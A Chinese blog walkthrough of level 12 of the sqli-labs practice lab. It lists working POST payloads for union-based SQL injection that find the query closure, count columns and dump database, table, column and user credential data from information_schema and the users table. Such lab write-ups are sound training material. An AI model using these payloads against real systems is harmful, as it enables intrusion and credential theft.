- 1雷达恒虚警处理matlab_雷达信号处理基础之【恒虚警处理】
- 2AIGC提示词(Prompt)网站_aigc提示词网站
- 3华为OD机试真题-围棋的气-2023年OD统一考试(C卷)---python代码_华为题"围棋的气"python答案
- 4Ubuntu22.04 安装显卡驱动+CUDA_ubuntu22.04安装cuda
- 5android manifest.xml中的meta-data属性
- 6【六种方案】【idea】最全解决IntelliJ IDEA控制台输出中文乱码问题_idea控制台输出中文乱码怎么解决
- 7【研发日记】Matlab/Simulink技能解锁(八)——分布式仿真
- 8AIGC 010-CLIP第一个文本和图像对齐的大模型!
- 9裁员来临前有什么征兆,如何应对被裁员?_有预感被裁该准备些什么
- 10以gitee码云和vscode为例进行多人协作开发_vscode多人协作
sqli-labs第十二关_sqli-labs第12关
赞
踩
post传值,跟十一关差不多。
可以用burpsuite来做:
就是正常的sql注入流程
第一步,判断闭合方式
uname=1")b&passwd=&submit=Submit
uname=1")#b&passwd=&submit=Submit
由此判断为,双引号反括号闭合;
第二步,判断字段数
uname=" or "1" = "1&passwd=1 ")order by 3#&submit=Submit
uname=1&passwd=1 ")order by 3#&submit=S
uname=" or "1" = "1&passwd=1 ")order by 2#&submit=Submit
uname=1&passwd=1 ")order by 2#&submit=Submit
第三步,判断注入点
uname=1"or"1"="1&passwd=1 ")union select 1,2#&submit=Submit
第四步,报数据库名
uname=1"or"1"="1&passwd=1 ")union select 1,database()#&submit=Submit
第五步,爆表名
uname=1"or"1"="1&passwd=1 ")union select 1,(select group_concat(table_name)from information_schema.tables where table_schema='security')#&submit=Submit
第六步,爆字段名
uname=1"or"1"="1&passwd=1 ")union select 1,(select group_concat(column_name)from information_schema.columns where table_schema='security' and table_name='users')#&submit=Submit
第七步,爆数据
uname=1"or"1"="1&passwd=1 ")union select 1,(select group_concat(id,username,password)from users)#&submit=Submit
至此结束吧!
对了,也可以用报错注入,下次再写。
